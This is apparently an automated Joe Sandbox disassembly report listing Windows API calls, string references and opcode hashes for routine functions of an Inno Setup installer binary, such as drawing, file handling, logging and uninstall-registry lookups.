                                                                                  • Instruction ID: 83ce80fc9267d5d428aaa6df1625a13447daaa7447f81d414e1cac2b658c4c33
                                                                                  • Opcode Fuzzy Hash: 71c513547c29eaccdfaecffc02c852d5dde81b2ca1a428a61261a5d29c2d410e
                                                                                  • Instruction Fuzzy Hash: 7A21A7B4A002919AE711B77BD88571D27C19BCB348F048D7FE204BB3E2C6BC9845876E
                                                                                  APIs
                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 004565BE
                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,004566C2,?,?,?,00000000), ref: 004565C4
                                                                                    • Part of subcall function 00455E54: CloseHandle.KERNEL32(?), ref: 00455E8B
                                                                                    • Part of subcall function 00455E54: WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00455EB5
                                                                                    • Part of subcall function 00455E54: GetExitCodeProcess.KERNEL32(?), ref: 00455EC6
                                                                                    • Part of subcall function 00455E54: CloseHandle.KERNEL32(?,?,00002710,?,00000001,?,00002710,?), ref: 00455F0D
                                                                                    • Part of subcall function 00455E54: Sleep.KERNEL32(000000FA,?,?,00002710,?,00000001,?,00002710,?), ref: 00455F29
                                                                                    • Part of subcall function 00455E54: TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00455EA7
                                                                                  • SetCursor.USER32(?,0045661E,00000000,00000000,00007F02,00000000,004566C2,?,?,?,00000000), ref: 00456611
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$CloseHandleProcess$CodeExitLoadObjectSingleSleepTerminateWait
                                                                                  • String ID: (H$OYE
                                                                                  • API String ID: 268187739-2757987876
                                                                                  • Opcode ID: 06a12a002cb1244c0219a8e94730869e13d4870d0980adfe738e4db2766fb0d9
                                                                                  • Instruction ID: 80344db19b2d3dc66d15a3b082488a561e0bf88ca79fb369c4216448c0e3ee89
                                                                                  • Opcode Fuzzy Hash: 06a12a002cb1244c0219a8e94730869e13d4870d0980adfe738e4db2766fb0d9
                                                                                  • Instruction Fuzzy Hash: 1621C630B04244AFD700EFB5CC52AAEB7B5EF49704F5184B9F814E7382D6399E04DA58
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,0048BF91), ref: 0044E8D3
                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044E8D9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: NotifyWinEvent$dD$user32.dll
                                                                                  • API String ID: 1646373207-754903266
                                                                                  • Opcode ID: 55c295f1cc5d78022375e23a864dbeea4cdf27def68da061f67070053b1ae725
                                                                                  • Instruction ID: 6f3eef60c9e9f8bca30f167dd17001dd4b230fc33c1fb50221aced91b9243400
                                                                                  • Opcode Fuzzy Hash: 55c295f1cc5d78022375e23a864dbeea4cdf27def68da061f67070053b1ae725
                                                                                  • Instruction Fuzzy Hash: D1E0E2B0D423549EFF00BBABA80670D2B90B786318B100D3FB000A72A3DBBC54008B2F
                                                                                  APIs
                                                                                  • BeginPaint.USER32(00000000,?), ref: 00416BCA
                                                                                  • SaveDC.GDI32(?), ref: 00416BFB
                                                                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416CBD), ref: 00416C5C
                                                                                  • RestoreDC.GDI32(?,?), ref: 00416C83
                                                                                  • EndPaint.USER32(00000000,?,00416CC4,00000000,00416CBD), ref: 00416CB7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                  • String ID:
                                                                                  • API String ID: 3808407030-0
                                                                                  • Opcode ID: d592171da4c938bafcf936c0086993132369e846045610b77fcec3763392838a
                                                                                  • Instruction ID: 44173a806610cc2a0f7a84eef1e7c46e19ee39e9d3bd8f998c62ff03b6372ea0
                                                                                  • Opcode Fuzzy Hash: d592171da4c938bafcf936c0086993132369e846045610b77fcec3763392838a
                                                                                  • Instruction Fuzzy Hash: B3413070A04244AFCB14DB99C589FAAB7F8EF48304F1640AEE9459B362D778DD81CF58
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d19718cc61eb0ebed1c8484c63cf8a5ffc0cd75b77aaf8aef84a9c465de788e0
                                                                                  • Instruction ID: 9ace0b3b2935820ee7b560957f3f8bc0a053a8f9cee0d5a88840a45d54f733b9
                                                                                  • Opcode Fuzzy Hash: d19718cc61eb0ebed1c8484c63cf8a5ffc0cd75b77aaf8aef84a9c465de788e0
                                                                                  • Instruction Fuzzy Hash: 0C313D756057809FC320EF69C984BA7B7E8AF89714F08891EF9D5C7791C738E8818B19
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429780
                                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004297AF
                                                                                  • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 004297CB
                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 004297F6
                                                                                  • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00429814
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: f04093217f2f1ab0d76b0efe3bf800e6011fd958bc18ba85cba2e8952884e484
                                                                                  • Instruction ID: f17c03f16c2e45d72cdde071dd68045594553a73c6083b7350d2d28b5e82ec4c
                                                                                  • Opcode Fuzzy Hash: f04093217f2f1ab0d76b0efe3bf800e6011fd958bc18ba85cba2e8952884e484
                                                                                  • Instruction Fuzzy Hash: 0821AF707407547BE710BB66DC82F8B77ACDB42708F90443E7901AB2D2DBB8AD418618
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0041BB42
                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0041BB4C
                                                                                  • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BB8A
                                                                                  • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BCF5,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BBD1
                                                                                  • DeleteObject.GDI32(00000000), ref: 0041BC12
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem$A26310A570DeleteObject
                                                                                  • String ID:
                                                                                  • API String ID: 4277397052-0
                                                                                  • Opcode ID: 5d5fd2fef9d403d127db6f8fab16ae2940cd9654f0770bc5dc27dcabff545849
                                                                                  • Instruction ID: 3fa7685a67a15552732f984b0cc73aa6ed030683ca773aa8fe06809e40434c0f
                                                                                  • Opcode Fuzzy Hash: 5d5fd2fef9d403d127db6f8fab16ae2940cd9654f0770bc5dc27dcabff545849
                                                                                  • Instruction Fuzzy Hash: C4315274E00609EFDB00DFA5C981AAEB7F5EB48700F1185AAF510AB781D7789E80DF94
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CF6
                                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403D01
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403D14
                                                                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D1E
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D2D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                  • String ID:
                                                                                  • API String ID: 262959230-0
                                                                                  • Opcode ID: 6e5a2532e2edfada960d3c16bda104fed74af8a92018e7cc51947678d752182d
                                                                                  • Instruction ID: 130462c07d05b28363deeaafe8667491fd09684ef10d5f25643daadcb478a337
                                                                                  • Opcode Fuzzy Hash: 6e5a2532e2edfada960d3c16bda104fed74af8a92018e7cc51947678d752182d
                                                                                  • Instruction Fuzzy Hash: B5F044617542043BE25065A65C43F6B198CCB81B5AF50497FB704FA1D1D8BCAD0443BD
                                                                                  APIs
                                                                                  • 73A18830.GDI32(00000000,00000000,00000000), ref: 00414391
                                                                                  • 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414399
                                                                                  • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143AD
                                                                                  • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143B3
                                                                                  • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143BE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: A122A18830$A480
                                                                                  • String ID:
                                                                                  • API String ID: 3325508737-0
                                                                                  • Opcode ID: bc81a6cf2c892044b6ff6dae652bc43183ac66d36f855f04dfbe14e31c812b4e
                                                                                  • Instruction ID: 719f7997073d743f6e196bee26cf5b96d2419ceac2afdc2a946d95fe951065ad
                                                                                  • Opcode Fuzzy Hash: bc81a6cf2c892044b6ff6dae652bc43183ac66d36f855f04dfbe14e31c812b4e
                                                                                  • Instruction Fuzzy Hash: 4D01D43520C3806AD200B63D8C85A9F7BDC8FC6314F15446EF594DB282C97AC8018775
                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(?), ref: 00452E47
                                                                                  • WaitForInputIdle.USER32(?,000000FF), ref: 00452E58
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00452E7B
                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00452E8B
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00452E94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleWait$CodeExitIdleInputMultipleObjectsProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2750287839-0
                                                                                  • Opcode ID: d501a6389a47ac7d9d285b947ec4262abe0fb616b17c658bf8901b3616788b0c
                                                                                  • Instruction ID: cf77b02ba2349ec8059ba7eea0c4b969825fee422fed668d17670615be322a75
                                                                                  • Opcode Fuzzy Hash: d501a6389a47ac7d9d285b947ec4262abe0fb616b17c658bf8901b3616788b0c
                                                                                  • Instruction Fuzzy Hash: AC019E31904309AADF11EFA4C946B9E77AC9B05315F50443BB914AB1C2CA7C9E04CB28
                                                                                  APIs
                                                                                    • Part of subcall function 0041EFEC: GetActiveWindow.USER32 ref: 0041EFEF
                                                                                    • Part of subcall function 0041EFEC: GetCurrentThreadId.KERNEL32 ref: 0041F004
                                                                                    • Part of subcall function 0041EFEC: 73A25940.USER32(00000000,Function_0001EFC8), ref: 0041F00A
                                                                                    • Part of subcall function 00423120: GetSystemMetrics.USER32(00000000), ref: 00423122
                                                                                  • OffsetRect.USER32(?,?,?), ref: 00424D41
                                                                                  • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E04
                                                                                  • OffsetRect.USER32(?,?,?), ref: 00424E15
                                                                                    • Part of subcall function 004234DC: GetCurrentThreadId.KERNEL32 ref: 004234F1
                                                                                    • Part of subcall function 004234DC: SetWindowsHookExA.USER32(00000003,00423498,00000000,00000000), ref: 00423501
                                                                                    • Part of subcall function 004234DC: CreateThread.KERNEL32(00000000,000003E8,00423448,00000000,00000000), ref: 00423525
                                                                                    • Part of subcall function 00424AA4: SetTimer.USER32(00000000,00000001,?,0042342C), ref: 00424ABF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$CurrentOffsetRect$A25940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                                                                  • String ID: KB
                                                                                  • API String ID: 1906964682-1869488878
                                                                                  • Opcode ID: b455287324744fd578d92fc05afaeebe0ca0f7b249b3b14bf95fcef47375b4ad
                                                                                  • Instruction ID: 6da3e0c0eeca582111f069c5fa3f6562dccb8bc8bbc1e14d43133ce80f9a09b2
                                                                                  • Opcode Fuzzy Hash: b455287324744fd578d92fc05afaeebe0ca0f7b249b3b14bf95fcef47375b4ad
                                                                                  • Instruction Fuzzy Hash: DB813971A00218CFDF14DFA9C880ADEBBF9FF49314F50416AE805AB296DB38AD45CB44
                                                                                  APIs
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00452107,?,00000000,00452171,?,?,-00000001,00000000,?,00472825,00000000,00472774,00000000), ref: 004520E3
                                                                                  • FindClose.KERNEL32(000000FF,0045210E,00452107,?,00000000,00452171,?,?,-00000001,00000000,?,00472825,00000000,00472774,00000000,00000001), ref: 00452101
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileNext
                                                                                  • String ID: 7kG$7kG
                                                                                  • API String ID: 2066263336-411931201
                                                                                  • Opcode ID: d5ebbc721013e3d1495a770f26084927735dec5b9305c4d39f90f4b520031a62
                                                                                  • Instruction ID: aee3bb6c3adaf712ac189a04c3ba89f635c955d3c4359fb8b2dff7203ddf9331
                                                                                  • Opcode Fuzzy Hash: d5ebbc721013e3d1495a770f26084927735dec5b9305c4d39f90f4b520031a62
                                                                                  • Instruction Fuzzy Hash: 2F817E3490424DAFCF11DFA1C8457EFBBB4AF46305F1040ABE94467292D3799E4ACB98
                                                                                  APIs
                                                                                  • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406F87
                                                                                  • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407001
                                                                                  • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 00407059
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Enum$NameOpenResourceUniversal
                                                                                  • String ID: Z
                                                                                  • API String ID: 3604996873-1505515367
                                                                                  • Opcode ID: 80b6b3a754d2296c8e39b5c3bb55ba01a5fe7329079c730ad38ac81671512874
                                                                                  • Instruction ID: 6aed910540b4d58f0b490118c864aa5300790b374abdc89a884aadaabc42f9cf
                                                                                  • Opcode Fuzzy Hash: 80b6b3a754d2296c8e39b5c3bb55ba01a5fe7329079c730ad38ac81671512874
                                                                                  • Instruction Fuzzy Hash: 4D514F70E042499BDB11DF95CD41A9FBBB9EB49304F1041BAE500BB3D1C778BE458B6A
                                                                                  APIs
                                                                                  • 73A1A570.USER32(00000000,00000000,0042E84B,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E722
                                                                                    • Part of subcall function 0041A160: CreateFontIndirectA.GDI32(?), ref: 0041A21F
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0042E745
                                                                                  • 73A1A480.USER32(00000000,?,0042E830,00000000,0042E829,?,00000000,00000000,0042E84B,?,?,?,?,00000000,00000000,00000000), ref: 0042E823
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                  • String ID: ...\
                                                                                  • API String ID: 2998766281-983595016
                                                                                  • Opcode ID: 8a8f6d0a20ea0f6581f414b8a37501446bb38c226ab82a6265bc20e2030464ab
                                                                                  • Instruction ID: e82d55d5ffb7537e988c760741b0b26b2114c5351e112588ef3c8446cf046441
                                                                                  • Opcode Fuzzy Hash: 8a8f6d0a20ea0f6581f414b8a37501446bb38c226ab82a6265bc20e2030464ab
                                                                                  • Instruction Fuzzy Hash: 6E314374B00128AFDF11EB9AD851BAEB7B8EB48304F90447BF400E7291D7789D41CB59
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?,00000000,00454DD1,?,?,00000000,00000000,0048C071,00000000), ref: 00454CA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: LocalTime
                                                                                  • String ID: %.4u-%.2u-%.2u$%s Log %s #%.3u.txt$Log opened.
                                                                                  • API String ID: 481472006-3806465849
                                                                                  • Opcode ID: 9c5e242a5c0f3a5da160fc7bf852b4f758d39573e9a7aed896cfa10680189295
                                                                                  • Instruction ID: 74bddbf1f39cc8d58f0c3049acc45ba0e2fcd78c31cbc1a06d0134202ad16786
                                                                                  • Opcode Fuzzy Hash: 9c5e242a5c0f3a5da160fc7bf852b4f758d39573e9a7aed896cfa10680189295
                                                                                  • Instruction Fuzzy Hash: 4E414F70D00218EFDB01DFA6D8417EEBBF5FB89315F50446AE800B7291D7785949CB65
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,0048A541,_iu,?,00000000,004518EE), ref: 004518A3
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,0048A541,_iu,?,00000000,004518EE), ref: 004518B3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFileHandle
                                                                                  • String ID: .tmp$_iu
                                                                                  • API String ID: 3498533004-10593223
                                                                                  • Opcode ID: cca56d814c4233687e3bf4e8090f2ed79a8bc43212dd5efa669e636e9494cad7
                                                                                  • Instruction ID: 0d8466233033120bebecf5d6bf496d02ef49810b281d758f30ca519c16631cff
                                                                                  • Opcode Fuzzy Hash: cca56d814c4233687e3bf4e8090f2ed79a8bc43212dd5efa669e636e9494cad7
                                                                                  • Instruction Fuzzy Hash: DC31D870E40149ABDB11FBA5C942B9EB7B5AF05305F60457AF800B73D2D7386F059768
                                                                                  APIs
                                                                                    • Part of subcall function 0042DBBC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004787FF,?,00000001,?,?,004787FF,?,00000001,00000000), ref: 0042DBD8
                                                                                  • RegCloseKey.ADVAPI32(?,004868AA,?,?,00000001,00000000,00000000,004868C5), ref: 00486893
                                                                                  Strings
                                                                                  • Inno Setup CodeFile: , xrefs: 00486856
                                                                                  • %s\%s_is1, xrefs: 00486824
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00486806
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: %s\%s_is1$Inno Setup CodeFile: $Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                  • API String ID: 47109696-1837835967
                                                                                  • Opcode ID: 8ac1cfa1fb7d22cbafb4ffce6db8a8256f3e84f3e5c2dcb2360a9a11c2b5605c
                                                                                  • Instruction ID: 0262983ad28c5a5a995087726afd71748d09213a497a98ad7c1bee27f4268d31
                                                                                  • Opcode Fuzzy Hash: 8ac1cfa1fb7d22cbafb4ffce6db8a8256f3e84f3e5c2dcb2360a9a11c2b5605c
                                                                                  • Instruction Fuzzy Hash: CF315274A042449FDB41EFAACC51B9EBBE8EB48304F51487AE804E7391D778AE058B59
                                                                                  APIs
                                                                                  • GetClassInfoA.USER32(00400000,?,?), ref: 004163F7
                                                                                  • UnregisterClassA.USER32(?,00400000), ref: 00416423
                                                                                  • RegisterClassA.USER32(?), ref: 00416446
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Class$InfoRegisterUnregister
                                                                                  • String ID: @
                                                                                  • API String ID: 3749476976-2766056989
                                                                                  • Opcode ID: 42dd291e9ca491d6c90a519e805b37db4fc3f45b6415dfc9897799ab7a902921
                                                                                  • Instruction ID: a52ac1bcd12796c98f99dd001e26f9202d2c65be789c743a618f8aee8a7d07cd
